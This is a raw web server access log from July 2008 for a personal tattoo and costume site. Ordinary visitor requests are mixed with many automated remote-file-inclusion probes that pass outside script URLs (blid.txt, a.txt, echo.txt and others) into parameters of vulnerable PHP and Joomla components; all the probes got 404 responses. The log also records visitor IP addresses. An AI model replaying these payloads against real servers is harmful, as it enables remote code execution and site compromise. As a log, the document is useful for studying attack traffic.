71.65.120.249 - - [10/Jul/2008:21:11:53 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:53 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:53 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:53 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:53 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:53 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:53 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:58 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:58 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:58 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.65.120.249 - - [10/Jul/2008:21:11:58 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
80.67.23.172 - - [10/Jul/2008:21:12:07 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.808"
77.74.196.90 - - [10/Jul/2008:21:12:07 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
66.225.192.5 - - [10/Jul/2008:21:12:58 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
66.225.192.5 - - [10/Jul/2008:21:12:58 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
116.125.113.115 - - [10/Jul/2008:21:13:38 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
116.125.113.115 - - [10/Jul/2008:21:13:38 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
217.160.200.228 - - [10/Jul/2008:21:17:45 -0500] "GET /logs//pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
217.160.200.228 - - [10/Jul/2008:21:17:45 -0500] "GET //pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
87.106.10.24 - - [10/Jul/2008:21:20:14 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.106.10.24 - - [10/Jul/2008:21:20:14 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
70.87.197.18 - - [10/Jul/2008:21:20:37 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
70.87.197.18 - - [10/Jul/2008:21:20:38 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
87.106.10.24 - - [10/Jul/2008:21:21:00 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.106.10.24 - - [10/Jul/2008:21:21:01 -0500] "GET //faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
200.11.67.242 - - [10/Jul/2008:21:22:49 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
200.11.67.242 - - [10/Jul/2008:21:22:50 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
87.106.101.24 - - [10/Jul/2008:21:23:27 -0500] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 357 "-""libwww-perl/5.805"
87.106.101.24 - - [10/Jul/2008:21:23:27 -0500] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
208.68.3.10 - - [10/Jul/2008:21:26:42 -0500] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.happyfacesadface.net/ray/readme1.txt%0D?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
208.68.3.10 - - [10/Jul/2008:21:26:42 -0500] "GET //components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.happyfacesadface.net/ray/readme1.txt%0D?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
208.98.1.12 - - [10/Jul/2008:21:26:51 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tripi-ddl.com/video/mraneti.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
208.98.1.12 - - [10/Jul/2008:21:26:51 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tripi-ddl.com/video/mraneti.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
116.125.113.115 - - [10/Jul/2008:21:27:05 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
116.125.113.115 - - [10/Jul/2008:21:27:05 -0500] "GET //faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
66.225.192.5 - - [10/Jul/2008:21:27:46 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
66.225.192.5 - - [10/Jul/2008:21:27:46 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
71.35.158.114 - - [10/Jul/2008:21:34:07 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.35.158.114 - - [10/Jul/2008:21:34:08 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.35.158.114 - - [10/Jul/2008:21:34:08 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.35.158.114 - - [10/Jul/2008:21:34:09 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.35.158.114 - - [10/Jul/2008:21:34:09 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.35.158.114 - - [10/Jul/2008:21:35:05 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
75.200.96.123 - - [10/Jul/2008:21:35:48 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?q=tattoo+ideas&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
75.200.96.123 - - [10/Jul/2008:21:35:48 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
75.200.96.123 - - [10/Jul/2008:21:35:48 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 206 3776 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
75.200.96.123 - - [10/Jul/2008:21:35:50 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
75.200.96.123 - - [10/Jul/2008:21:35:51 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
75.200.96.123 - - [10/Jul/2008:21:35:58 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
75.200.96.123 - - [10/Jul/2008:21:36:04 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
207.58.170.49 - - [10/Jul/2008:21:36:11 -0500] "GET //ktmlZ/include/ktedit/activex.phphttp://imageserenity.com/proofing/albums/id.txt??? HTTP/1.1" 404 364 "-""libwww-perl/5.811"
207.58.170.49 - - [10/Jul/2008:21:36:11 -0500] "GET /logs//ktmlZ/include/ktedit/activex.phphttp://imageserenity.com/proofing/albums/id.txt??? HTTP/1.1" 404 369 "-""libwww-perl/5.811"
71.35.158.114 - - [10/Jul/2008:21:36:46 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.35.158.114 - - [10/Jul/2008:21:36:50 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.35.158.114 - - [10/Jul/2008:21:36:50 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.35.158.114 - - [10/Jul/2008:21:36:50 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.35.158.114 - - [10/Jul/2008:21:36:51 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.35.158.114 - - [10/Jul/2008:21:36:51 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.35.158.114 - - [10/Jul/2008:21:36:51 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.35.158.114 - - [10/Jul/2008:21:36:51 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.35.158.114 - - [10/Jul/2008:21:36:51 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.35.158.114 - - [10/Jul/2008:21:36:51 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.35.158.114 - - [10/Jul/2008:21:36:52 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
71.35.158.114 - - [10/Jul/2008:21:36:52 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15"
205.234.234.3 - - [10/Jul/2008:21:40:48 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
205.234.234.3 - - [10/Jul/2008:21:40:48 -0500] "GET //faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.812"
88.255.236.6 - - [10/Jul/2008:21:46:37 -0500] "GET /logs/access_log.1207785600//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 372 "-""libwww-perl/5.805"
88.255.236.6 - - [10/Jul/2008:21:46:38 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
88.255.236.6 - - [10/Jul/2008:21:46:38 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hotelsunflower.it/includes/ons.txt? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
77.74.196.90 - - [10/Jul/2008:21:48:13 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
77.74.196.90 - - [10/Jul/2008:21:48:13 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
77.74.196.90 - - [10/Jul/2008:21:48:13 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
208.88.50.150 - - [10/Jul/2008:21:49:10 -0500] "GET /logs/access_log.1207785600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
208.88.50.150 - - [10/Jul/2008:21:49:10 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.810"
208.88.50.150 - - [10/Jul/2008:21:49:10 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
208.88.50.150 - - [10/Jul/2008:21:49:29 -0500] "GET /logs/access_log.1181952000//faqsupport/samplefaqsupport.php?path[docroot]=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
64.202.126.170 - - [10/Jul/2008:21:51:59 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
64.202.126.170 - - [10/Jul/2008:21:51:59 -0500] "GET //faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
64.202.126.170 - - [10/Jul/2008:21:52:00 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
64.202.126.170 - - [10/Jul/2008:21:52:00 -0500] "GET //faqsupport/samplefaqsupport.php?path%5bdocroot%5d=http://granitecast.com////orca/a.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
77.74.196.90 - - [10/Jul/2008:21:53:50 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
77.74.196.90 - - [10/Jul/2008:21:53:51 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
87.238.199.56 - - [10/Jul/2008:21:55:42 -0500] "GET /logs/access_log.1207785600/!scanhttp://www.injoyusa.com/pw.txt? HTTP/1.1" 404 346 "-""libwww-perl/5.803"
87.238.199.56 - - [10/Jul/2008:21:55:42 -0500] "GET /!scanhttp://www.injoyusa.com/pw.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
87.238.199.56 - - [10/Jul/2008:21:55:42 -0500] "GET /logs/!scanhttp://www.injoyusa.com/pw.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
217.221.183.132 - - [10/Jul/2008:21:57:50 -0500] "GET /logs/index.php?spage=http://www.geocities.com/superman.cool1989/echo.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
217.221.183.132 - - [10/Jul/2008:21:57:50 -0500] "GET /index.php?spage=http://www.geocities.com/superman.cool1989/echo.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
217.221.183.132 - - [10/Jul/2008:21:58:08 -0500] "GET /logs/index.php?spage=http://www.geocities.com/superman.cool1989/echo.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
217.221.183.132 - - [10/Jul/2008:21:58:08 -0500] "GET /index.php?spage=http://www.geocities.com/superman.cool1989/echo.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
62.1.206.147 - - [10/Jul/2008:22:00:35 -0500] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
62.1.206.147 - - [10/Jul/2008:22:00:36 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
217.221.183.132 - - [10/Jul/2008:22:01:10 -0500] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.geocities.com/superman.cool1989/echo.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
217.221.183.132 - - [10/Jul/2008:22:01:11 -0500] "GET /include/status_top_x.inc.php?tm_includepath=http://www.geocities.com/superman.cool1989/echo.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
217.221.183.132 - - [10/Jul/2008:22:01:12 -0500] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.geocities.com/superman.cool1989/echo.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
217.221.183.132 - - [10/Jul/2008:22:01:13 -0500] "GET /include/status_top_x.inc.php?tm_includepath=http://www.geocities.com/superman.cool1989/echo.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
87.118.114.47 - - [10/Jul/2008:22:03:43 -0500] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://www.vogtland-korna.de/templates/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
87.118.114.47 - - [10/Jul/2008:22:03:43 -0500] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://www.vogtland-korna.de/templates/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
87.118.114.47 - - [10/Jul/2008:22:03:44 -0500] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.vogtland-korna.de/templates/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.118.114.47 - - [10/Jul/2008:22:03:44 -0500] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.vogtland-korna.de/templates/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
201.55.48.7 - - [10/Jul/2008:22:05:37 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
201.55.48.7 - - [10/Jul/2008:22:05:37 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
62.1.206.147 - - [10/Jul/2008:22:05:47 -0500] "GET /logs//includes/get_header.php?vwar_root=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
62.1.206.147 - - [10/Jul/2008:22:05:47 -0500] "GET //includes/get_header.php?vwar_root=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
66.98.250.45 - - [10/Jul/2008:22:07:44 -0500] "GET /logs//errors.php?error=http://www.elektropoechhacker.at/mambo/bajo.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
66.98.250.45 - - [10/Jul/2008:22:07:44 -0500] "GET //errors.php?error=http://www.elektropoechhacker.at/mambo/bajo.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
213.195.72.156 - - [10/Jul/2008:22:10:04 -0500] "GET /logs//errors.php?error=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
213.195.72.156 - - [10/Jul/2008:22:10:04 -0500] "GET //errors.php?error=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
89.218.85.18 - - [10/Jul/2008:22:12:27 -0500] "GET /logs/index.php?spage=http://www.geocities.com/superman.cool1989/echo.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.218.85.18 - - [10/Jul/2008:22:12:28 -0500] "GET /index.php?spage=http://www.geocities.com/superman.cool1989/echo.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
71.89.32.116 - - [10/Jul/2008:22:12:53 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://search.netscape.com/search/search?invocationType=NSCPAB&query=queen+ann+bolen""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.1.11pre) Gecko/20071206 Firefox/2.0.0.11 Navigator/9.0.0.5"
71.89.32.116 - - [10/Jul/2008:22:12:54 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.1.11pre) Gecko/20071206 Firefox/2.0.0.11 Navigator/9.0.0.5"
71.89.32.116 - - [10/Jul/2008:22:12:54 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.1.11pre) Gecko/20071206 Firefox/2.0.0.11 Navigator/9.0.0.5"
71.89.32.116 - - [10/Jul/2008:22:12:59 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.1.11pre) Gecko/20071206 Firefox/2.0.0.11 Navigator/9.0.0.5"
72.47.205.18 - - [10/Jul/2008:22:13:11 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
72.47.205.18 - - [10/Jul/2008:22:13:11 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
83.98.156.151 - - [10/Jul/2008:22:14:10 -0500] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
83.98.156.151 - - [10/Jul/2008:22:14:11 -0500] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/help01.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
81.92.219.130 - - [10/Jul/2008:22:14:57 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.813"
81.92.219.130 - - [10/Jul/2008:22:14:58 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.813"
